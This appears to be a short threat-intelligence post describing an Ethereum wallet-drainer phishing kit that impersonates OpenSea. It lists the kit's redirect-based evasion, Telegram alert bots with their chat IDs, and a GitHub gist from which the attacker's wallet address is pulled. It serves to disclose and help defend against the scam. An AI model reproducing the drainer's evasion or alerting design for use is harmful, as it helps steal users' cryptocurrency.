Spotted first by @ecarlesi. ETH drainer impersonating OpenSea. The malicious actor/s could be Dutch as well as the targets, based on the drainer site's language.
This drainer kit redirects you to a different website if:
- you did not use the correct path
- you already connected previously to the website (via storage objects)
It also includes a Telegram bot to alert the malicious actor/s for real-time movements.
Telegram bot used:
chat id: -709367678
admin id: 2146370516
It also retrieves the same ETH wallet address from a Github gist: /gist.githubusercontent.com/ethereumjs-tx/020102e055e65567fe158f018fa226c6/raw/4171303cd239f36b6d4781d21786492de783ff9e/SIGN%2520ETH
The account was created recently:
The claim page has a different Telegram bot compared to the document and index.
chat id: -1001599540988
tanjrii is still the creator